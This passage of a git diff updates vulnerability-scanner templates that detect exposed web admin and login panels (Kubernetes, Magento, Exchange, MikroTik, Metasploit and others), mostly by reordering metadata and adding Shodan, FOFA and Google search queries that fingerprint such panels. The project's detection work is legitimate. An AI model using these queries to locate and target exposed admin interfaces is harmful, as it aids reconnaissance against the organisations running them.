http.title:"kubernetes web view" + google-query: intitle:"kubernetes web view" tags: tech,kubernetes,panel http: diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index 63903170f1..1d8f7c856d 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Mirantis-Kubernetes-Engine" + verified: true max-request: 1 shodan-query: http.html:"Mirantis Kubernetes Engine" - verified: true + fofa-query: app="Mirantis-Kubernetes-Engine" tags: tech,kubernetes,devops,kube,k8s,panel http: diff --git a/http/exposed-panels/kubernetes-web-view.yaml b/http/exposed-panels/kubernetes-web-view.yaml index 4f00638cae..f286c3b30b 100644 --- a/http/exposed-panels/kubernetes-web-view.yaml +++ b/http/exposed-panels/kubernetes-web-view.yaml @@ -11,11 +11,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: kubernetes - shodan-query: title:"Kubernetes Web View" - vendor: kubernetes verified: true + max-request: 2 + vendor: kubernetes + product: kubernetes + shodan-query: + - title:"Kubernetes Web View" + - http.title:"kubernetes web view" + fofa-query: + - title="kubernetes web view" + - app="kubernetes-enterprise-manager" + google-query: intitle:"kubernetes web view" tags: panel,misconfig,kubernetes,k8s http: diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index 95d6f14f14..5a020b406d 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -10,11 +10,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 - product: kubeview - shodan-query: http.favicon.hash:-379154636 - vendor: kubeview_project verified: true + max-request: 1 + vendor: kubeview_project + product: kubeview + shodan-query: + - http.favicon.hash:-379154636 + - http.title:"kubeview" + fofa-query: + - icon_hash=-379154636 + - title="kubeview" + google-query: intitle:"kubeview" tags: exposure,k8s,kubernetes,kubeview,dashboard,panel,kubeview_project http: diff --git a/http/exposed-panels/labkey-server-login.yaml b/http/exposed-panels/labkey-server-login.yaml index ca086da89c..399d6f2dd4 100644 --- a/http/exposed-panels/labkey-server-login.yaml +++ b/http/exposed-panels/labkey-server-login.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: labkey_server - shodan-query: 'title:"Sign In: /home"' - vendor: labkey verified: true + max-request: 2 + vendor: labkey + product: labkey_server + shodan-query: + - 'title:"Sign In: /home"' + - 'http.title:"sign in: /home"' + - "server: labkey" + fofa-query: 'title="sign in: /home"' + google-query: 'intitle:"sign in: /home"' tags: panel,labkey http: diff --git a/http/exposed-panels/labtech-panel.yaml b/http/exposed-panels/labtech-panel.yaml index 03d12747aa..99f8540c2e 100644 --- a/http/exposed-panels/labtech-panel.yaml +++ b/http/exposed-panels/labtech-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:labtech_software:labtech:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: labtech vendor: labtech_software + product: labtech tags: panel,labtech,labtech_software http: diff --git a/http/exposed-panels/lancom-router-panel.yaml b/http/exposed-panels/lancom-router-panel.yaml index c71df494f3..d785944471 100644 --- a/http/exposed-panels/lancom-router-panel.yaml +++ b/http/exposed-panels/lancom-router-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"LANCOM Systems GmbH" - verified: true tags: panel,lancom,router http: diff --git a/http/exposed-panels/lansweeper-login.yaml b/http/exposed-panels/lansweeper-login.yaml index d6ee32ec14..df6545cd22 100644 --- a/http/exposed-panels/lansweeper-login.yaml +++ b/http/exposed-panels/lansweeper-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: lansweeper - shodan-query: title:"Lansweeper - Login" - vendor: lansweeper verified: true + max-request: 1 + vendor: lansweeper + product: lansweeper + shodan-query: + - title:"Lansweeper - Login" + - http.title:"lansweeper - login" + fofa-query: title="lansweeper - login" + google-query: intitle:"lansweeper - login" tags: lansweeper,tech,panel http: diff --git a/http/exposed-panels/ldap-account-manager-panel.yaml b/http/exposed-panels/ldap-account-manager-panel.yaml index 3ba3a162d6..9c7623438a 100644 --- a/http/exposed-panels/ldap-account-manager-panel.yaml +++ b/http/exposed-panels/ldap-account-manager-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"LDAP Account Manager" - verified: true tags: panel,ldap http: diff --git a/http/exposed-panels/lenovo-fp-panel.yaml b/http/exposed-panels/lenovo-fp-panel.yaml index 8ce4d1b5e6..ac7bcf1e92 100644 --- a/http/exposed-panels/lenovo-fp-panel.yaml +++ b/http/exposed-panels/lenovo-fp-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:lenovo:fan_power_controller:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: fan_power_controller - shodan-query: http.html:"Fan and Power Controller" - vendor: lenovo verified: true + max-request: 2 + vendor: lenovo + product: fan_power_controller + shodan-query: + - http.html:"Fan and Power Controller" + - http.html:"fan and power controller" + fofa-query: body="fan and power controller" tags: panel,lenovo http: diff --git a/http/exposed-panels/librenms-login.yaml b/http/exposed-panels/librenms-login.yaml index 13cbab886c..04787f97b4 100644 --- a/http/exposed-panels/librenms-login.yaml +++ b/http/exposed-panels/librenms-login.yaml @@ -10,10 +10,10 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* metadata: - fofa-query: title="librenms" max-request: 1 - product: librenms vendor: librenms + product: librenms + fofa-query: title="librenms" tags: librenms,panel http: diff --git a/http/exposed-panels/librephotos-panel.yaml b/http/exposed-panels/librephotos-panel.yaml index 24ce313d6e..b63b378024 100644 --- a/http/exposed-panels/librephotos-panel.yaml +++ b/http/exposed-panels/librephotos-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/LibrePhotos/librephotos metadata: + verified: true max-request: 1 shodan-query: title:"LibrePhotos" - verified: true tags: panel,librephotos,detect,login http: diff --git a/http/exposed-panels/librespeed-panel.yaml b/http/exposed-panels/librespeed-panel.yaml index de2f5f7c49..cccf0d50e9 100644 --- a/http/exposed-panels/librespeed-panel.yaml +++ b/http/exposed-panels/librespeed-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/librespeed/speedtest metadata: + verified: true max-request: 1 shodan-query: title:"LibreSpeed" - verified: true tags: panel,librespeed,detect http: diff --git a/http/exposed-panels/liferay-portal.yaml b/http/exposed-panels/liferay-portal.yaml index 2e77adaecd..c7f0d40df3 100644 --- a/http/exposed-panels/liferay-portal.yaml +++ b/http/exposed-panels/liferay-portal.yaml @@ -13,11 +13,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: liferay_portal - shodan-query: http.favicon.hash:129457226 - vendor: liferay verified: true + max-request: 3 + vendor: liferay + product: liferay_portal + shodan-query: + - http.favicon.hash:129457226 + - cpe:"cpe:2.3:a:liferay:liferay_portal" + fofa-query: icon_hash=129457226 tags: panel,liferay,portal http: diff --git a/http/exposed-panels/linkerd-panel.yaml b/http/exposed-panels/linkerd-panel.yaml index f519306563..946b921de8 100644 --- a/http/exposed-panels/linkerd-panel.yaml +++ b/http/exposed-panels/linkerd-panel.yaml @@ -11,11 +11,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:linkerd:linkerd:*:*:*:*:kubernetes:*:*:* metadata: - max-request: 1 - product: linkerd - shodan-query: html:"data-controller-namespace" - vendor: linkerd verified: true + max-request: 1 + vendor: linkerd + product: linkerd + shodan-query: + - html:"data-controller-namespace" + - http.html:"data-controller-namespace" + fofa-query: body="data-controller-namespace" tags: panel,misconfig,linkerd,exposure http: diff --git a/http/exposed-panels/linshare-panel.yaml b/http/exposed-panels/linshare-panel.yaml index 1cbd30641e..f3211780a6 100644 --- a/http/exposed-panels/linshare-panel.yaml +++ b/http/exposed-panels/linshare-panel.yaml @@ -9,9 +9,9 @@ info: - https://www.linshare.org/ - https://github.com/linagora/linshare metadata: + verified: true max-request: 3 shodan-query: http.title:"LinShare" - verified: true tags: panel,linshare,login,detect http: diff --git a/http/exposed-panels/livehelperchat-admin-panel.yaml b/http/exposed-panels/livehelperchat-admin-panel.yaml index ecba3823f0..ec86122799 100644 --- a/http/exposed-panels/livehelperchat-admin-panel.yaml +++ b/http/exposed-panels/livehelperchat-admin-panel.yaml @@ -10,12 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:* metadata: - fofa-query: title="Live Helper Chat" - max-request: 1 - product: live_helper_chat - shodan-query: title:"Live Helper Chat" - vendor: livehelperchat verified: true + max-request: 1 + vendor: livehelperchat + product: live_helper_chat + shodan-query: + - title:"Live Helper Chat" + - http.title:"live helper chat" + fofa-query: + - title="Live Helper Chat" + - title="live helper chat" + google-query: intitle:"live helper chat" tags: livehelperchat,panel http: diff --git a/http/exposed-panels/livezilla-login-panel.yaml b/http/exposed-panels/livezilla-login-panel.yaml index e5954e2f65..f0265db335 100644 --- a/http/exposed-panels/livezilla-login-panel.yaml +++ b/http/exposed-panels/livezilla-login-panel.yaml @@ -11,8 +11,10 @@ info: cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: livezilla vendor: livezilla + product: livezilla + shodan-query: http.html:livezilla + fofa-query: body=livezilla tags: panel,livezilla,login http: diff --git a/http/exposed-panels/locklizard-webviewer-panel.yaml b/http/exposed-panels/locklizard-webviewer-panel.yaml index 9dc5197be3..57a6e7b9dc 100644 --- a/http/exposed-panels/locklizard-webviewer-panel.yaml +++ b/http/exposed-panels/locklizard-webviewer-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"Locklizard Web Viewer" - verified: true tags: panel,locklizard,webviewer http: diff --git a/http/exposed-panels/lockself-panel.yaml b/http/exposed-panels/lockself-panel.yaml index 100c23b03a..781e23acc1 100644 --- a/http/exposed-panels/lockself-panel.yaml +++ b/http/exposed-panels/lockself-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.lockself.com/en/ metadata: + verified: true max-request: 1 shodan-query: http.title:"LockSelf" - verified: true tags: panel,lockself,login,detect http: diff --git a/http/exposed-panels/logitech-harmony-portal.yaml b/http/exposed-panels/logitech-harmony-portal.yaml index ff6b57b576..cdd28d2e8d 100644 --- a/http/exposed-panels/logitech-harmony-portal.yaml +++ b/http/exposed-panels/logitech-harmony-portal.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Logitech Harmony Pro Installer" - verified: true tags: panel,logitech,harmony,exposure http: diff --git a/http/exposed-panels/lomnido-panel.yaml b/http/exposed-panels/lomnido-panel.yaml index ed6906b085..257a57b10c 100644 --- a/http/exposed-panels/lomnido-panel.yaml +++ b/http/exposed-panels/lomnido-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://lomnido.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Lomnido Login" - verified: true tags: lomnido,panel,login,detect http: diff --git a/http/exposed-panels/looker-panel.yaml b/http/exposed-panels/looker-panel.yaml index 8cfc10179a..8fc1e16a09 100644 --- a/http/exposed-panels/looker-panel.yaml +++ b/http/exposed-panels/looker-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"lookerVersion" - verified: true tags: panel,login,looker http: diff --git a/http/exposed-panels/loxone-panel.yaml b/http/exposed-panels/loxone-panel.yaml index 1f10ffc748..e60d8fd34d 100644 --- a/http/exposed-panels/loxone-panel.yaml +++ b/http/exposed-panels/loxone-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Loxone Intercom Video" - verified: true tags: panel,loxone http: diff --git a/http/exposed-panels/mach-proweb-login.yaml b/http/exposed-panels/mach-proweb-login.yaml index e592756d4d..8daab9a27c 100644 --- a/http/exposed-panels/mach-proweb-login.yaml +++ b/http/exposed-panels/mach-proweb-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Log on to MACH-ProWeb" - max-request: 1 verified: true + max-request: 1 + google-query: intitle:"Log on to MACH-ProWeb" tags: panel,machproweb,edb http: diff --git a/http/exposed-panels/machform-admin-panel.yaml b/http/exposed-panels/machform-admin-panel.yaml index 48721ca1b5..d5e6529fc0 100644 --- a/http/exposed-panels/machform-admin-panel.yaml +++ b/http/exposed-panels/machform-admin-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"MachForm Admin Panel" - verified: true tags: panel,machform,admin http: diff --git a/http/exposed-panels/maestro-login-panel.yaml b/http/exposed-panels/maestro-login-panel.yaml index 1a207ca7ae..b7633739c7 100644 --- a/http/exposed-panels/maestro-login-panel.yaml +++ b/http/exposed-panels/maestro-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Maestro - LuCI" - verified: true tags: panel,maestro,luci http: diff --git a/http/exposed-panels/mag-dashboard-panel.yaml b/http/exposed-panels/mag-dashboard-panel.yaml index 4131968392..212d688bc6 100644 --- a/http/exposed-panels/mag-dashboard-panel.yaml +++ b/http/exposed-panels/mag-dashboard-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"MAG Dashboard Login" - verified: true tags: panel,mag http: diff --git a/http/exposed-panels/magento-admin-panel.yaml b/http/exposed-panels/magento-admin-panel.yaml index 2b34bec945..3b839abab9 100644 --- a/http/exposed-panels/magento-admin-panel.yaml +++ b/http/exposed-panels/magento-admin-panel.yaml @@ -13,11 +13,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: magento - shodan-query: http.component:"Magento" - vendor: magento verified: true + max-request: 1 + vendor: magento + product: magento + shodan-query: + - http.component:"Magento" + - cpe:"cpe:2.3:a:magento:magento" + - http.component:"magento" tags: magento,panel http: diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index 776d0ef150..5da56797d6 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -12,11 +12,14 @@ info: classification: cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: magento - shodan-query: http.component:"Magento" - vendor: magento verified: true + max-request: 1 + vendor: magento + product: magento + shodan-query: + - http.component:"Magento" + - cpe:"cpe:2.3:a:magento:magento" + - http.component:"magento" tags: magento,exposure,panel http: diff --git a/http/exposed-panels/magnolia-panel.yaml b/http/exposed-panels/magnolia-panel.yaml index b89b7d42ac..142f151ca9 100644 --- a/http/exposed-panels/magnolia-panel.yaml +++ b/http/exposed-panels/magnolia-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"Magnolia is a registered trademark" - verified: true tags: magnolia,panel,login http: diff --git a/http/exposed-panels/mailhog-panel.yaml b/http/exposed-panels/mailhog-panel.yaml index 90246e87a5..90982dff9f 100644 --- a/http/exposed-panels/mailhog-panel.yaml +++ b/http/exposed-panels/mailhog-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"mailhog" - verified: true tags: panel,mailhog,mail,smtp http: diff --git a/http/exposed-panels/mailwatch-login.yaml b/http/exposed-panels/mailwatch-login.yaml index 03d81def4c..8ce0bfce40 100644 --- a/http/exposed-panels/mailwatch-login.yaml +++ b/http/exposed-panels/mailwatch-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"MailWatch Login Page" - verified: true tags: panel,mailwatch http: diff --git a/http/exposed-panels/maltrail-panel.yaml b/http/exposed-panels/maltrail-panel.yaml index d8e45550eb..06fd079f2c 100644 --- a/http/exposed-panels/maltrail-panel.yaml +++ b/http/exposed-panels/maltrail-panel.yaml @@ -7,9 +7,9 @@ info: description: | Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name, URL (e.g. hXXp://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value. metadata: + verified: true max-request: 1 shodan-query: title:"Maltrail" - verified: true tags: panel,maltrail,detect http: diff --git a/http/exposed-panels/mantisbt-panel.yaml b/http/exposed-panels/mantisbt-panel.yaml index 2740052f80..a21fcb73e1 100644 --- a/http/exposed-panels/mantisbt-panel.yaml +++ b/http/exposed-panels/mantisbt-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: mantisbt - shodan-query: http.favicon.hash:662709064 - vendor: mantisbt verified: true + max-request: 1 + vendor: mantisbt + product: mantisbt + shodan-query: + - http.favicon.hash:662709064 + - cpe:"cpe:2.3:a:mantisbt:mantisbt" + fofa-query: icon_hash=662709064 tags: panel,mantisbt http: diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml index 0fe7fd23af..e36fd314fd 100644 --- a/http/exposed-panels/matomo-panel.yaml +++ b/http/exposed-panels/matomo-panel.yaml @@ -15,10 +15,13 @@ info: cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 - product: matomo + max-request: 3 vendor: matomo - shodan-query: http.favicon.hash:-2023266783 + product: matomo + shodan-query: + - "http.favicon.hash:-2023266783" + - cpe:"cpe:2.3:a:matomo:matomo" + fofa-query: icon_hash=-2023266783 tags: panel,matomo,login,detect http: diff --git a/http/exposed-panels/memos-panel.yaml b/http/exposed-panels/memos-panel.yaml index d6e8a9d429..a10594589d 100644 --- a/http/exposed-panels/memos-panel.yaml +++ b/http/exposed-panels/memos-panel.yaml @@ -12,11 +12,15 @@ info: classification: cpe: cpe:2.3:a:usememos:memos:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: memos - shodan-query: title:"Memos" - vendor: usememos verified: true + max-request: 2 + vendor: usememos + product: memos + shodan-query: + - title:"Memos" + - http.title:"memos" + fofa-query: title="memos" + google-query: intitle:"memos" tags: panel,memos,detect,usememos http: diff --git a/http/exposed-panels/meshcentral-login.yaml b/http/exposed-panels/meshcentral-login.yaml index ab9bc4476b..3835210b64 100644 --- a/http/exposed-panels/meshcentral-login.yaml +++ b/http/exposed-panels/meshcentral-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:meshcentral:meshcentral:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: meshcentral - shodan-query: http.title:"MeshCentral - Login" vendor: meshcentral + product: meshcentral + shodan-query: + - http.title:"MeshCentral - Login" + - http.title:"meshcentral - login" + fofa-query: title="meshcentral - login" + google-query: intitle:"meshcentral - login" tags: panel,meshcentral http: diff --git a/http/exposed-panels/metabase-panel.yaml b/http/exposed-panels/metabase-panel.yaml index 4f4365f5e0..be0cc52f0d 100644 --- a/http/exposed-panels/metabase-panel.yaml +++ b/http/exposed-panels/metabase-panel.yaml @@ -11,9 +11,15 @@ info: cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: metabase - shodan-query: http.title:"Metabase" vendor: metabase + product: metabase + shodan-query: + - http.title:"Metabase" + - http.title:"metabase" + fofa-query: + - title="metabase" + - app="metabase" + google-query: intitle:"metabase" tags: panel,metabase,login http: diff --git a/http/exposed-panels/metasploit-panel.yaml b/http/exposed-panels/metasploit-panel.yaml index 6e9ffcbe38..8db8721111 100644 --- a/http/exposed-panels/metasploit-panel.yaml +++ b/http/exposed-panels/metasploit-panel.yaml @@ -11,12 +11,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: metasploit - shodan-query: http.title:"metasploit" - vendor: rapid7 verified: true - zoomeye-query: title:'Metasploit' + max-request: 1 + vendor: rapid7 + product: metasploit + shodan-query: + - http.title:"metasploit" + - http.title:"metasploit - setup and configuration" + zoomeye-query: + - title:'Metasploit' + - title:'metasploit' + fofa-query: + - title="metasploit" + - title="metasploit - setup and configuration" + google-query: + - intitle:"metasploit" + - intitle:"metasploit - setup and configuration" tags: panel,metasploit,login,rapid7 http: diff --git a/http/exposed-panels/metasploit-setup-page.yaml b/http/exposed-panels/metasploit-setup-page.yaml index 13fd587383..659bd96521 100644 --- a/http/exposed-panels/metasploit-setup-page.yaml +++ b/http/exposed-panels/metasploit-setup-page.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: metasploit - shodan-query: title:"Metasploit - Setup and Configuration" - vendor: rapid7 verified: true + max-request: 1 + vendor: rapid7 + product: metasploit + shodan-query: + - title:"Metasploit - Setup and Configuration" + - http.title:"metasploit" + - http.title:"metasploit - setup and configuration" + zoomeye-query: title:'metasploit' + fofa-query: + - title="metasploit" + - title="metasploit - setup and configuration" + google-query: + - intitle:"metasploit" + - intitle:"metasploit - setup and configuration" tags: panel,metasploit,setup,rapid7 http: diff --git a/http/exposed-panels/metersphere-login.yaml b/http/exposed-panels/metersphere-login.yaml index c91bce9369..89dccedc81 100644 --- a/http/exposed-panels/metersphere-login.yaml +++ b/http/exposed-panels/metersphere-login.yaml @@ -13,8 +13,12 @@ info: cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: metersphere vendor: metersphere + product: metersphere + fofa-query: + - body="metersphere" + - title="metersphere" + shodan-query: http.html:"metersphere" tags: panel,metersphere http: diff --git a/http/exposed-panels/mfiles-web-detect.yaml b/http/exposed-panels/mfiles-web-detect.yaml index eb80eff0e3..415b0b2c1f 100644 --- a/http/exposed-panels/mfiles-web-detect.yaml +++ b/http/exposed-panels/mfiles-web-detect.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:m-files:m-files:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: m-files - shodan-query: http.html:"M-Files Web" - vendor: m-files verified: true + max-request: 2 + vendor: m-files + product: m-files + shodan-query: + - http.html:"M-Files Web" + - http.html:"m-files web" + fofa-query: body="m-files web" tags: panel,m-files http: diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index ebfc273cf2..e00f37d0ac 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:microfocus:enterprise_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: enterprise_server - shodan-query: Micro Focus DSD - vendor: microfocus verified: true + max-request: 4 + vendor: microfocus + product: "enterprise_server" + shodan-query: + - "Micro Focus DSD" + - micro focus dsd tags: panel,microfocus,detect,login http: diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 84917c5591..575bf2190b 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:microfocus:filr:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - product: filr + max-request: 2 vendor: microfocus - shodan-query: http.html:"Micro Focus Filr" + product: filr + shodan-query: + - "http.html:\"Micro Focus Filr\"" + - http.html:"micro focus filr" + fofa-query: body="micro focus filr" tags: panel,microfocus,filr,detect http: diff --git a/http/exposed-panels/microfocus-lifecycle-panel.yaml b/http/exposed-panels/microfocus-lifecycle-panel.yaml index 3ac49b36dd..2ba1d9ffff 100644 --- a/http/exposed-panels/microfocus-lifecycle-panel.yaml +++ b/http/exposed-panels/microfocus-lifecycle-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.opentext.com/products/alm-quality-center metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Micro Focus Application Lifecycle Management" tags: panel,microfocus,login,detect diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index fe281b5dbc..d4b8adc101 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:microfocus:vibe:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vibe - shodan-query: http.html:"Micro Focus Vibe" - vendor: microfocus verified: true + max-request: 1 + vendor: microfocus + product: vibe + shodan-query: + - http.html:"Micro Focus Vibe" + - http.html:"micro focus vibe" + fofa-query: body="micro focus vibe" tags: panel,microfocus,vibe http: diff --git a/http/exposed-panels/microsoft-exchange-panel.yaml b/http/exposed-panels/microsoft-exchange-panel.yaml index 719b83d355..9e646bc45c 100644 --- a/http/exposed-panels/microsoft-exchange-panel.yaml +++ b/http/exposed-panels/microsoft-exchange-panel.yaml @@ -13,8 +13,16 @@ info: cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: exchange_server vendor: microsoft + product: exchange_server + shodan-query: + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - icon_hash=1768726119 + - title="outlook" + google-query: intitle:"outlook" tags: microsoft,panel,exchange http: diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml index 380d7a3880..52278315a0 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:mikrotik:routeros:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: routeros - shodan-query: title:"mikrotik routeros > administration" - vendor: mikrotik verified: true + max-request: 1 + vendor: mikrotik + product: routeros + shodan-query: + - title:"mikrotik routeros > administration" + - http.title:"mikrotik routeros > administration" + fofa-query: title="mikrotik routeros > administration" + google-query: intitle:"mikrotik routeros > administration" tags: panel,login,mikrotik http: diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml index 01a84ddab1..c0f66687ce 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -13,8 +13,11 @@ info: cpe: cpe:2.3:o:mikrotik:routeros:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: routeros vendor: mikrotik + product: routeros + shodan-query: http.title:"mikrotik routeros > administration" + fofa-query: title="mikrotik routeros > administration" + google-query: intitle:"mikrotik routeros > administration" tags: panel,login,mikrotik http: diff --git a/http/exposed-panels/mini-start-page.yaml b/http/exposed-panels/mini-start-page.yaml index 5f72162cad..6231ba16c2 100644 --- a/http/exposed-panels/mini-start-page.yaml +++ b/http/exposed-panels/mini-start-page.yaml @@ -13,8 +13,8 @@ info: cpe: 